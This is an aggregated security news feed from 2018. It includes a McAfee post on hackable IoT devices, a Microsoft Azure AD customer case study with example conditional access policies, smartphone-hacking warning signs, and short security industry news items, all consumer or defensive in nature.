With a click of a button or by the sound of our voice, our favorite shows will play, pause, rewind ten seconds, and more – all thanks to smart TVs and streaming devices. But is there a sinister side? Turns out, there is. Some smart TVs can be controlled by cybercriminals by exploiting easy-to-find security flaws. By infecting a computer or mobile device with malware, a cybercriminal could gain control of your smart TV if your devices are using the same Wi-Fi. To prevent an attack, consider purchasing devices from mainstream brands that keep security in mind, and update associated software and apps regularly.

Home Wi-Fi Routers

Wi-Fi is the lifeblood of the 21st century; it’s become a necessity rather than a luxury. But your router is also a cybercriminal’s window into your home. Especially if you have numerous IoT devices hooked up to the same Wi-Fi, a hacker that successfully cracks into your network can get ahold of passwords and personal information, all of which can be used to gain access to your accounts, and launch spear phishing attacks against you to steal your identity or worse. Cybercriminals do this by exploiting weaknesses in your home network. To stay secure, consider a comprehensive security solution like McAfee® Secure Home Platform.

Health Devices and Apps

Digital health is set to dominate the consumer market in the next few years. Ranging from apps to hardware, the ways in which our health is being digitized varies, and so do the types of attacks that can be orchestrated. For example, on physical devices like pacemakers, malware can be implanted directly on to the device, enabling a hacker to control it remotely and inflict real harm to patients. When it comes to apps like pedometers, a hacker could source information like your physical location or regular routines.  Each of these far from benign scenarios highlight the importance of cybersecurity as the health market becomes increasingly reliant on technology and connectivity.

Smart Speakers

It seems like everyone nowadays has at least one smart speaker in their home. However, these speakers are always listening in, and if hacked, could be exploited by cybercriminals through spear phishing attacks. This can be done by spoofing actual websites which trick users into thinking that they are receiving a message from an official source. But once the user clicks on the email, they’ve just given a cybercriminal access to their home network, and by extension, all devices connected to that network too, smart speakers and all. To stay secure, start with protection on your router that extends to your network, change default passwords, and check for built-in security features.

Voice Assistants

Like smart speakers, voice assistants are always listening and, if hacked, could gain a wealth of information about you. But voice assistants are also often used as a central command hub, connecting other devices to them (including other smart speakers, smart lights or smart locks). Some people opt to connect accounts like food delivery, driver services, and shopping lists that use credit cards. If hacked, someone could gain access to your financial information or even access to your home. To keep cybercriminals out, consider a comprehensive security system, know which apps you can trust, and always keep your software up to date.

Connected Cars

Today, cars are essentially computers on wheels. Between backup cameras, video screens, GPS systems, and Wi-Fi networks, they have more electronics stacked in them than ever. The technology makes the experience smoother, but if it has a digital heartbeat, it's hackable. In fact, an attacker can take control of your car in a couple of ways: either by physically implanting a tiny device that grants access to your car through a phone, or by leveraging a black box tool and your car's diagnostic port completely remotely. Hacks can range anywhere from cranking the radio up to cutting the transmission or disabling the brakes. To stay secure, limit connectivity between your mobile devices and a car when possible, as phones are exposed to risks every day, and any time you connect one to your car, you put the car at risk, too.

Smart Thermostats

A smart thermostat can regulate your home's temperature and save you money by learning your preferences. But what if your friendly temperature regulator turned against you? If you don't change your default, factory-set password and login information, a hacker could take control of your device and make it join a botnet.

Connected Doorbells

When we think high-tech, the first thing that comes to mind is most likely not a doorbell. But connected doorbells are becoming more popular, especially as IoT devices are more widely adopted in our homes. So how can these devices be hacked, exactly? Attackers sent an official-looking email asking the device owner to download the doorbell's app, and by doing so the user unwittingly gave full access to the unwelcome guest. From there, the hackers could access call logs, the number of devices available, and even video files from past calls. Take heed from this hack: when setting up a new device, watch out for phishing emails and always make sure that an app is legitimate before you download it.

Smart Pet Cameras

We all love our furry friends, and it's hard when we have to leave them behind as we head out the door. So it's comforting to know that we can keep an eye on them, and even give them the occasional treat, through pet cameras. But this pet-nology can be hacked by cybercriminals to get an inside look at your home, as proven by the "Hackable?" crew. Through a device's app, a white-hat hacker was able to access the product's database and download photos and videos of other device owners. Talk about creepy. To keep prying eyes out of your private photos, get a comprehensive security solution for your home network and devices, avoid checking on your pet from unsecured Wi-Fi, and do your research on smart products you purchase for your pets.

Cell Phones

Mobile phones are one of the most vulnerable devices simply because they go everywhere you go. They essentially operate as a personal remote control to your digital life. In any given day, we access financial accounts, confirm doctor's appointments and communicate with family and friends. That's why it's shocking to know how surprisingly easy it is for cybercriminals to access the treasure trove of personal data on your cell phone. Phones can be compromised in a variety of ways; here are a few: accessing your personal information by way of public Wi-Fi (say, while you're at an airport), implanting a bug, leveraging a flaw in the operating system, or infecting your device with malware by way of a bad link while surfing the web or browsing email. Luckily, you can help secure your device by using comprehensive security such as McAfee Total Protection, or by leveraging a VPN (virtual private network) if you find yourself needing to use public Wi-Fi.

Virtual Reality Headsets

Once something out of science fiction, virtual reality (VR) is now a high-tech reality for many. Surprisingly, despite being built on state-of-the-art technology, VR is quite hackable. As an example, through common and easy-to-execute tactics like phishing to prompt someone to download malware, white-hat hackers were able to infect a linked computer and run a command and control interface that manipulated the VR experience and disoriented the user. While this attack isn't common yet, it could certainly start to gain traction as more VR headsets make their way into homes. To stay secure, be picky and only download software from reputable sources.

This is only the tip of the iceberg when it comes to hackable, everyday items. And while there’s absolutely no doubt that IoT devices certainly make life easier, what it all comes down to is control versus convenience. As we look toward 2019, we should ask ourselves, “what do we value more?”

Stay up-to-date on the latest trends by subscribing to our podcast, “Hackable?” and follow us on Twitter or Facebook.

The post 12 Days of Hack-mas appeared first on McAfee Blogs.

McAfee Blogs: 12 Days of Hack-mas

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. And the ways in which they exact their attacks are becoming more sophisticated and harder to detect. 2019 shows no sign of slowing down when it comes to attacks. Between the apps and websites we use every day, in addition to the numerous connected devices we continue to add our homes, there are a lot of ways in which our cybersecurity can be compromised. Let’s take a look at 12 common, connected devices that are vulnerable to attacks –most of which our friends at the “Hackable?” podcast have demonstrated– and what we can do to protect what matters. This way, as we move into the new year, security is top of mind.

Connected Baby Monitors

When you have a child, security and safety fuels the majority of your thoughts. That’s why it’s terrifying to think that a baby monitor, meant to give you peace of mind, could get hacked. Our own “Hackable?” team illustrated exactly how easy it is. They performed a “man-in-the-middle” attack to intercept data from an IoT baby monitor. But the team didn’t stop there; next they overloaded the device with commands and completely crashed the system without warning a parent, potentially putting a baby in danger. If you’re a parent looking to bring baby tech into your home, always be on the lookout for updates, avoid knockoffs or brands you’re not familiar with, and change your passwords regularly.

Smart TVs

With a click of a button or by the sound of our voice, our favorite shows will play, pause, rewind ten seconds, and more – all thanks to smart TVs and streaming devices. But is there a sinister side? Turns out, there is. Some smart TVs can be controlled by cybercriminals by exploiting easy-to-find security flaws. By infecting a computer or mobile device with malware, a cybercriminal could gain control of your smart TV if your devices are using the same Wi-Fi. To prevent an attack, consider purchasing devices from mainstream brands that keep security in mind, and update associated software and apps regularly.

Home Wi-Fi Routers

Wi-Fi is the lifeblood of the 21st century; it’s become a necessity rather than a luxury. But your router is also a cybercriminal’s window into your home. Especially if you have numerous IoT devices hooked up to the same Wi-Fi, a hacker that successfully cracks into your network can get ahold of passwords and personal information, all of which can be used to gain access to your accounts, and launch spear phishing attacks against you to steal your identity or worse. Cybercriminals do this by exploiting weaknesses in your home network. To stay secure, consider a comprehensive security solution like McAfee® Secure Home Platform.

Health Devices and Apps

Digital health is set to dominate the consumer market in the next few years. Ranging from apps to hardware, the ways in which our health is being digitized varies, and so do the types of attacks that can be orchestrated. For example, on physical devices like pacemakers, malware can be implanted directly on to the device, enabling a hacker to control it remotely and inflict real harm to patients. When it comes to apps like pedometers, a hacker could source information like your physical location or regular routines.  Each of these far from benign scenarios highlight the importance of cybersecurity as the health market becomes increasingly reliant on technology and connectivity.

Smart Speakers

It seems like everyone nowadays has at least one smart speaker in their home. However, these speakers are always listening in, and if hacked, could be exploited by cybercriminals through spear phishing attacks. This can be done by spoofing actual websites which trick users into thinking that they are receiving a message from an official source. But once the user clicks on the email, they’ve just given a cybercriminal access to their home network, and by extension, all devices connected to that network too, smart speakers and all. To stay secure, start with protection on your router that extends to your network, change default passwords, and check for built-in security features.

Voice Assistants

Like smart speakers, voice assistants are always listening and, if hacked, could gain a wealth of information about you. But voice assistants are also often used as a central command hub, connecting other devices to them (including other smart speakers, smart lights or smart locks). Some people opt to connect accounts like food delivery, driver services, and shopping lists that use credit cards. If hacked, someone could gain access to your financial information or even access to your home. To keep cybercriminals out, consider a comprehensive security system, know which apps you can trust, and always keep your software up to date.

Connected Cars

Today, cars are essentially computers on wheels. Between backup cameras, video screens, GPS systems, and Wi-Fi networks, they have more electronics stacked in them than ever. The technology makes the experience smoother, but if it has a digital heartbeat, it’s hackable. In fact, an attacker can take control of your car a couple of ways; either by physically implanting a tiny device that grants access to your car through a phone, or by leveraging a black box tool and  your car’s diagnostic port completely remotely. Hacks can range anywhere from cranking the radio up to cutting the transmission or disabling the breaks. To stay secure, limit connectivity between your mobile devices and a car when possible, as phones are exposed to risks every day, and any time you connect it to your car, you put it at risk, too.

Smart Thermostats

A smart thermostat can regulate your home’s temperature and save you money by learning your preferences. But what if your friendly temperature regulator turned against you? If you don’t change your default, factory-set password and login information, a hacker could take control of your device and make it join a botnet

Connected Doorbells

When we think high-tech, the first thing that comes to mind is most likely not a doorbell. But connected doorbells are becoming more popular, especially as IoT devices are more widely adopted in our homes. So how can these devices be hacked, exactly? By sending an official-looking email that requests that a device owner download the doorbell’s app, the user unwittingly gave full access to the unwelcome guest. From there, the hackers could access call logs, the number of devices available, and even video files from past calls. Take heed from this hack; when setting up a new device, watch out for phishing emails and always make sure that an app is legitimate before you download it.

Smart Pet Cameras

We all love our furry friends and when we have to leave them behind as we head out the door. And it’s comforting to know that we can keep an eye on them, even give them the occasional treat through pet cameras. But this pet-nology can be hacked into by cybercriminals to see what’s get an inside look at your home, as proven by the “Hackable?” crew. Through a device’s app, a white-hat hacker was able to access the product’s database and was able to download photos and videos of other device owners. Talk about creepy. To keep prying eyes out of your private photos, get a comprehensive security solution for your home network and devices, avoid checking on your pet from unsecured Wi-Fi, and do your research on smart products you purchase for your pets.

Cell Phones

Mobile phones are one of the most vulnerable devices simply because they go everywhere you go. They essentially operate as a personal remote control to your digital life. In any given day, we access financial accounts, confirm doctor’s appointments and communicate with family and friends. That’s why is shocking to know how surprisingly easy it is for cybercriminals to access the treasure trove of personal data on your cell phone. Phones can be compromised a variety of ways; but here are a few: accessing your personal information by way of public Wi-Fi (say, while you’re at an airport), implanting a bug, leveraging a flaw in the operating system, or by infecting your device with malware by way of a bad link while surfing the web or browsing email.  Luckily, you can help secure your device by using comprehensive security such as McAfee Total Protection, or by leveraging a VPN (virtual private network) if you find yourself needing to use public Wi-Fi.

Virtual Reality Headsets

Once something out of science fiction, virtual reality (VR) is now a high-tech reality for many. Surprisingly, despite being built on state-of-the-art technology, VR is quite hackable. As an example, through common and easy-to-execute tactics like phishing to prompt someone to download malware, white-hat hackers were able to infect a linked computer and run a command-and-control interface that manipulated the VR experience and disoriented the user. While this attack isn’t common yet, it could certainly start to gain traction as more VR headsets make their way into homes. To stay secure, be picky and only download software from reputable sources.

This is only the tip of the iceberg when it comes to hackable, everyday items. And while there’s no doubt that IoT devices make life easier, what it all comes down to is control versus convenience. As we look toward 2019, we should ask ourselves, “what do we value more?”

Stay up-to-date on the latest trends by subscribing to our podcast, “Hackable?” and follow us on Twitter or Facebook.

The post 12 Days of Hack-mas appeared first on McAfee Blogs.



McAfee Blogs

Voice of the Customer: The Walsh Group found that Azure Active Directory gives them a competitive edge

Today’s post was written by Sue Bohn, partner director of Program Management, and Peter Vallianatos and Phillip Nottoli, directors of IT Infrastructure and Security at The Walsh Group.

Hello!

This is Sue Bohn from the Customer & Partner Success team for the Identity Division. I’m delighted to announce the next post in our Voice of the Customer blog series. This series is designed to help you by sharing stories from real customers who are solving their identity and security challenges using Azure Active Directory (Azure AD). I hope you find valuable insights and best practices that you can apply to your own projects. If you haven’t already, check out the first blog in the series, Voice of the Customer: Walmart embraces the cloud with Azure AD.

This post features The Walsh Group, a large construction company in the United States. The Walsh Group has been with us from the early days in adopting Azure AD. They’ve taken advantage of its capabilities to strengthen access controls, provide more flexibility to users, and reduce the time their help desk spends on password resets. Peter Vallianatos and Phillip Nottoli, directors of IT Infrastructure and Security, provide insights on how they implemented Azure AD to give them a competitive advantage in the general contractor marketplace.

Security is no longer just about firewalls, it’s how we control identity

The Walsh Group is one of the largest construction companies in the United States with offices and job sites across the country. Like many businesses, identity and security initiatives increased in priority for us a few years ago. We had recently invested in Office 365, which allowed us to shift much of the responsibility for the uptime of our core productivity suite to Microsoft. It saved us time, but it also meant we would have less control than we were used to. We needed to find a way to manage our identities and shore up security. As an example, we did not have a Multi-Factor Authentication (MFA) solution. On top of that, our help desk was begging us to come up with a solution to reduce the amount of time they spent helping our users reset their passwords.

As we researched solutions to fill our security holes, we had to balance the need for best-in-breed security products with the fact that we have tight budgets and a drive to make economic decisions. It was important that we found tools that would be effective, easy to deploy, and easy to integrate. Historically, well before the Azure days, we viewed Microsoft as a strategic partner. So we quickly zeroed in on the complete Microsoft 365 identity stack that includes: Azure AD, Microsoft Cloud App Security, Microsoft Advanced Threat Analytics, Privileged Identity Management, Azure Advanced Threat Protection, Windows Defender Advanced Threat Protection, Azure Identity Protection, Microsoft Intune, Single Sign-on, Self-Service Password Reset, among others.

Azure AD conditional access is central to our Zero Trust strategy

Using the Microsoft security stack has also allowed us to begin implementing a Zero Trust strategy. We believe identity is the foundation of our security posture. As a construction company, we have so many locations, creating opportunities for exploitation. We must properly verify identities before we give access. Azure AD conditional access has given us tools to better control access by defining geographical rules and hardware restrictions. As an example, we simply blocked all access from many countries across the world. We could do that because we operate mostly within North America. As Azure AD conditional access matured, we changed our strategy. To support our people who vacation overseas, we’ve been able to build sophisticated rules that consider if a device is Intune managed, hybrid joined, and where the device is located. Combining that rule set with MFA, we’ve been able to safely give our vacationers access to email and other business resources.

Paying attention to the sign-in events, we can adjust our ruleset to further restrict or allow for circumstances that we did not consider. For certain, nearly all the failed sign-in attempts are malicious. It is nice to have that visibility into and control over when and how our networks are accessed.
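As an added illustration, and not The Walsh Group’s actual configuration (the post does not reproduce it), here is how a rule set of the kind described above could be expressed as Azure AD Conditional Access policies in the Microsoft Graph conditionalAccessPolicy JSON shape. The group and named-location IDs are placeholders; CA01 and CA02 together implement “Intune-compliant or hybrid-joined device, and MFA, whenever the user is off a trusted location”, while CA03 keeps the earlier blanket block for a named location covering countries the company never expects sign-ins from.

```json
[
  {
    "displayName": "CA01 - Require compliant or hybrid-joined device off trusted locations",
    "state": "enabledForReportingButNotEnforced",
    "conditions": {
      "users": {
        "includeUsers": ["All"],
        "excludeGroups": ["<placeholder: break-glass admin group object id>"]
      },
      "applications": { "includeApplications": ["All"] },
      "clientAppTypes": ["all"],
      "locations": {
        "includeLocations": ["All"],
        "excludeLocations": ["AllTrusted"]
      }
    },
    "grantControls": {
      "operator": "OR",
      "builtInControls": ["compliantDevice", "domainJoinedDevice"]
    }
  },
  {
    "displayName": "CA02 - Require MFA off trusted locations",
    "state": "enabled",
    "conditions": {
      "users": {
        "includeUsers": ["All"],
        "excludeGroups": ["<placeholder: break-glass admin group object id>"]
      },
      "applications": { "includeApplications": ["All"] },
      "clientAppTypes": ["all"],
      "locations": {
        "includeLocations": ["All"],
        "excludeLocations": ["AllTrusted"]
      }
    },
    "grantControls": {
      "operator": "OR",
      "builtInControls": ["mfa"]
    }
  },
  {
    "displayName": "CA03 - Block sign-in from countries where we do not operate",
    "state": "enabled",
    "conditions": {
      "users": {
        "includeUsers": ["All"],
        "excludeGroups": ["<placeholder: break-glass admin group object id>"]
      },
      "applications": { "includeApplications": ["All"] },
      "clientAppTypes": ["all"],
      "locations": {
        "includeLocations": ["<placeholder: named location id for blocked countries>"]
      }
    },
    "grantControls": {
      "operator": "OR",
      "builtInControls": ["block"]
    }
  }
]
```

Two policies are needed for the device-plus-MFA requirement because a single policy’s grant controls share one operator: CA01 accepts either device control, CA02 separately requires MFA, and a sign-in must satisfy every policy that applies to it. Leaving CA01 in report-only state first lets the sign-in logs show who would have been blocked before it is enforced.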

We bet the farm with Microsoft

We chose to be an early adopter of the Azure AD identity framework. At the time, the tools were just emerging, but we understood the vision, the direction, and Microsoft’s roadmap to get there. Microsoft helped us establish short-, middle-, and long-range plans, and we rely on their security and identity products more and more. We don’t have that level of confidence in, nor that relationship with, other vendors. For us, the evidence is clear: we chose the right partner. As a general contractor, this platform has allowed us to remain competitive in our marketplace. Our implementation of Azure AD gives us a competitive advantage that will continue to pay dividends as our cloud strategy grows and we make use of the Office 365 and Azure features. Currently, we have turned our energy towards Microsoft Cloud App Security and operationalizing the Windows Defender Advanced Threat Protection integration across platforms. Already, we are recognizing the value in having all three Advanced Threat Protection products integrated and will continue to fine-tune how we manage it.

Voice of the Customer: looking ahead

Many thanks to Pete and Phil for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers’ security and implementation insights more broadly. Bookmark the Microsoft Secure blog, so you don’t miss the next installment in this series, where our customer will speak to how Azure AD and implementing cloud identity and access management makes them more secure.

The post Voice of the Customer: The Walsh Group found that Azure Active Directory gives them a competitive edge appeared first on Microsoft Secure.


WordPress Botnet Infects Over 20,000 Sites and Turns Them into Attack Bots

Wordfence, a security firm, has reportedly uncovered a massive brute-force attack launched on WordPress sites. This attack reportedly infected

WordPress Botnet Infects Over 20,000 Sites and Turns Them into Attack Bots on Latest Hacking News.

CISO challenges and the path to cutting edge security

Zane Lackey is the co-founder and CSO at Signal Sciences, and the author of Building a Modern Security Program (O’Reilly Media). He serves on multiple Advisory Boards including the National Technology Security Coalition, the Internet Bug Bounty Program, and the US State Department-backed Open Technology Fund. Prior to co-founding Signal Sciences, Zane led a security team at the forefront of the DevOps/Cloud shift as CISO of Etsy. In this interview with Help Net Security he … More

The post CISO challenges and the path to cutting edge security appeared first on Help Net Security.

High profile incidents and new technologies drive cybersecurity M&A to record highs

The Cybersecurity M&A Market Report from international technology mergers and acquisitions advisors, Hampleton Partners, outlines how high profile hacks, the global digitisation of business and new regulations are driving record transaction volumes and valuations, with 141 completed transactions by October this year, surpassing 2016 and 2017 levels. 2018 has seen nine big ticket deals in excess of $500m from buyers such as Thoma Bravo, Cisco, RELX, AT&T and Francisco Partners, which have generated attention to … More

The post High profile incidents and new technologies drive cybersecurity M&A to record highs appeared first on Help Net Security.

An integrated approach helps companies improve operational resilience

By taking a unified approach to managing critical events (i.e. extreme weather, violence, supply chain disruption), businesses can significantly reduce the impact on employee safety, organizational reputation, and revenue, according to a study conducted by Forrester Consulting for Everbridge. According to the study, companies are investing significant resources in sophisticated controls to protect their employees, brand and assets from critical events. These disruptive incidents (ranging from cyberattacks to terrorist activity) increasingly lead to business impacts … More

The post An integrated approach helps companies improve operational resilience appeared first on Help Net Security.

McAfee Blogs: How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically log in as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.



McAfee Blogs


Supply chain compromise: Adding undetectable hardware Trojans to integrated circuits

Is it possible for attackers to equip integrated circuits with hardware Trojans that will not change the area or power consumption of the IC, making them thus indiscernible through power-based post fabrication analysis? A group of researchers from the National University of Sciences and Technology (Islamabad, Pakistan), the Vienna University of Technology and New York University have proven it is. They have also demonstrated that hardware Trojans (HTs) can be implanted not only by adding … More

The post Supply chain compromise: Adding undetectable hardware Trojans to integrated circuits appeared first on Help Net Security.

Avoid Coal in Your Digital Stocking — Here’s How to Improve Your Security Posture in 2019

As 2018 draws to a close, it’s time to reflect on the strides the cybersecurity industry made over the past year, and how far companies around the world still have to go to improve their security posture. Throughout the year, businesses were plagued by cybersecurity risks and hit with massive data breaches. In the lead-up to the holiday season, security leaders across industries are wishing for a quiet 2019 with no negative data breach headlines.

5 Cybersecurity Missteps That Put Enterprises at Risk in 2018

What lessons did we learn in 2018? And as we look forward, what best practices can we implement to improve defenses in the new year? We asked industry experts where they observe the worst security practices that still leave enterprises exposed to cybersecurity risks, and they offered advice to help companies and users enjoy a merrier, brighter, more secure 2019.

1. Poor Password Policies

Although passwords are far from perfect as a security mechanism, they are still used pervasively in the enterprise and in personal life. Yet password policies are still rife with problems around the globe.

Idan Udi Edry, CEO of Trustifi, said the most foundational — and also most disregarded — cybersecurity practice is maintaining a strong password.

“A unique password should be utilized for every account and not reused,” said Edry. “It is important to update passwords every 30–90 days. Passwords should never include a significant word, such as a pet’s name, or a significant date, such as a birthdate.”

Deploying devices and appliances and then leaving default passwords in place is also still a shockingly common practice. A threat actor with knowledge of a manufacturer or service provider’s default password conventions can do a lot of damage to an organization with factory settings still in place.

Edry advised enterprises to employ two-factor authentication (2FA) to add more security to their access strategy. Douglas Crawford, digital privacy adviser for BestVPN, meanwhile, recommended encouraging employees to use a password manager.

“It is hard to remember strong passwords for every website and service we use, so people simply stop bothering,” said Crawford. “Use of ‘123456’ as a password is still scarily common. And then we use the same password on every website we visit. This [is] particularly irksome, as this entire security nightmare can be easily remedied through use of password manager apps or services, which do the heavy lifting for us.”

2. Misconfigured Cloud Storage

Earlier this year, researchers from Digital Shadows uncovered more than 1.5 billion sensitive files stored in publicly available locations, such as misconfigured websites and unsecured network-attached storage (NAS) drives.

“Unfortunately, many administrators misconfigure [these buckets] rendering the contents publicly-accessible,” wrote Michael Marriott, senior strategy and research analyst with Digital Shadows.

The information uncovered included a treasure trove of personal data, such as payroll, tax return and health care information — all available to prying eyes thanks to overlooked security best practices in cloud storage.

“With the rise of mobility and cloud usage in enterprises, one of the worst security practices is leaving critical cloud services and SaaS applications open to the internet,” said Amit Bareket, co-founder and CEO of Perimeter 81.

It’s time to get proactive to analyze potential exposures in storage and then devise a plan to address cloud data risks to your organization. It’s also important to remember that with any connected service, it is often better not to deploy than to deploy insecurely.

3. Ineffective Cyber Awareness Training

Security begins and ends with your employees — but how much do they know about security? Specifically, how much do they know about the risks they are facing and how their actions could set your business up for a potential incident?

“At this time of the year, it’s critically important to ensure proper employee awareness of the risks related to travel,” said Baan Alsinawi, president and founder of TalaTek, a Washington-based risk management firm. “Using public Wi-Fi at airports or hotels to access corporate data, possible loss of personally-held devices such as an iPad, iPhone or corporate laptop, especially if not encrypted, talking to strangers about work issues or projects over a glass of wine can expose confidential information.”

Of course, a robust awareness program needs to be in place year-round. Data from London-based advisory and solutions company Willis Towers Watson found that employees are the cause of 66 percent of all cyberbreaches, either through negligence or deliberate offense.

Employees should be regularly educated on phishing, social engineering techniques and other attack vectors that could put corporate data at risk. If awareness training isn’t part of your security strategy, 2019 is the time to learn what an effective awareness program looks like and implement one to promote security best practices in your organization.

4. Poor Oversight of Third-Party Cybersecurity Risks

Third-party vendors and partners can be a source of compromise if criminals can access your organization’s sensitive information through their poorly secured systems. If you’re working with third-party vendors and partners, your security is only as good as theirs. If their systems are breached, your data is also at risk.

“Attackers seeking access to hardened company systems can pivot to breaching an integrated third party, establishing a beachhead there and then leveraging the trust implicit in the integration to gain access,” explained Ralph R. Russo, director of applied computing programs and professor of practice of IT management and cybersecurity at Tulane University School of Professional Advancement.

In 2019, evaluate the state of your third-party risk management. Make it a priority to identify gaps that may put you at risk if you are working with less-than-secure vendors. Implement a vigorous vetting process to determine the security level of your trusted partners.

5. Lack of an Incident Response Plan

A formal, regularly tested cybersecurity incident response plan is essential, yet many organizations continue to operate without one. In fact, 77 percent of companies do not have any formal plan.

Without a written and tested incident response plan, you’re unprepared for the worst-case scenario. It is not enough to focus on prevention; it is essential to establish a comprehensive incident response plan that is clear, detailed, flexible, includes multiple stakeholders, and tested and updated regularly.

Improve Your Security Posture in 2019 and Beyond

If your organization engages in any of these poor practices, it may be time to brush up on your basic cyber hygiene best practices. By following the recommendations outlined here, you can confidently resolve to close gaps in risk mitigation and establish more effective strategies to improve your company’s security posture in 2019 and beyond.

The post Avoid Coal in Your Digital Stocking — Here’s How to Improve Your Security Posture in 2019 appeared first on Security Intelligence.

Consumers still put trust in big brands despite breaches

Janrain conducted a survey to better understand how consumers really feel about brands in the wake of so many breaches. The company polled 1,000 UK adults and found that most consumers are still willing to part with their personal information if it can somehow benefit them. While big internet companies like Google and Facebook remain among the least trusted businesses, a large number of respondents put the most faith in pharmaceutical and travel companies including … More

The post Consumers still put trust in big brands despite breaches appeared first on Help Net Security.

5G and cybersecurity

Keeping you safe in an increasingly connected world

If you’ve upgraded your smartphone in the last few years, there’s a very good chance your handset supports 4G mobile networks. 4G, short for ‘fourth generation’, offers super-fast data download speeds allowing you to stream more video, share larger high-resolution pictures and to browse the web more quickly.

But even these speeds are not enough to keep pace with demand. Everything is getting bigger – 4K video file sizes are enormous, and augmented reality animations are bandwidth hungry.

There is a second issue that needs to be addressed too – the sheer number of wireless devices connecting to mobile networks. Smart devices are an increasingly important part of modern life, at home and in the workplace.

We need more bandwidth and faster connectivity to deal with the changing demands on mobile networks. We are already outgrowing the possibilities of 4G networking.

Welcome to 5G networking

The good news is that the fifth generation (5G) of mobile network technologies has been designed and is undergoing testing. Mobile operators across the world are in the advanced stages of planning how these systems will be rolled out to consumers and businesses in the UK and beyond.

The introduction of 5G technologies will allow us to do more than ever before with our devices – but it also highlights a serious challenge. More and more devices are being connected to mobile networks, and each represents a potential security risk.

Smart sensors used in factories allow manufacturers to monitor assembly lines in real time for instance. But if poorly configured, or insufficiently secured, these devices could be used to hack into the company network to steal other data.

Other devices, like self-driving cars, are completely reliant on mobile network connections to work properly. These vehicles are permanently connected, uploading and downloading data to the cloud to make split-second decisions. If these decisions are interrupted – by hackers breaking through the network security, for instance – the car could be involved in an accident, perhaps even killing people in the process.

More security required

With more devices connected to mobile networks, the need for security increases. Every single device needs to be protected against cyberattack, which means that security systems need to be present everywhere.

To cope with the increasing number of devices, security systems will also have to get smarter. Artificial intelligence will become more important, monitoring network activity to identify – and block – suspicious behaviour automatically. This approach is quicker, and more effective, than traditional IT security provisions especially as security software does not necessarily have to be installed directly on each device.

Play your part

Businesses will have to take care of their own smart sensors, but consumers need to get involved. The increased number of devices and network traffic presents a risk to you too – so you must ensure your smartphone is properly protected.

Even if you don’t have a 5G connection, you can take steps to protect yourself now. Download and install a free copy of Panda Security Antivirus for Android today and you’ll be fully prepared to overcome the future challenges of next generation mobile networks.

The post 5G and cybersecurity appeared first on Panda Security Mediacenter.

Not all data collection is evil: Don’t let privacy scandals stall cybersecurity

Facebook continues to be criticized for its data collection practices. The media is hammering Google over how it handles data. JPMorgan Chase & Company was vilified for using Palantir software to allegedly invade the privacy of employees. This past June marked the five-year anniversary of The Guardian’s first story about NSA mass surveillance operations. These incidents and many others have led to an era where the world is more heavily focused on privacy and trust. … More

The post Not all data collection is evil: Don’t let privacy scandals stall cybersecurity appeared first on Help Net Security.

How can businesses get the most out of pentesting?

More than 4.5 billion data records were compromised in the first half of this year. If you still feel like your enterprise is secure after reading that statistic, you’re one of the few. Hackers utilizing high-profile exploits to victimize organizations is becoming an almost daily occurrence, with 18,000 to 19,000 new vulnerabilities estimated to show up in 2018. Here’s the thing though – we can still address the situation and make the current threat landscape … More

The post How can businesses get the most out of pentesting? appeared first on Help Net Security.

Huawei CFO Arrested in Canada

Meng Wanzhou, Chief Financial Officer (CFO) of the world’s second largest telecom giant Huawei, and the daughter of its Founder

Huawei CFO Arrested in Canada on Latest Hacking News.

Australia Now Has an Encryption Bill, Labor Party Drops Suggestions

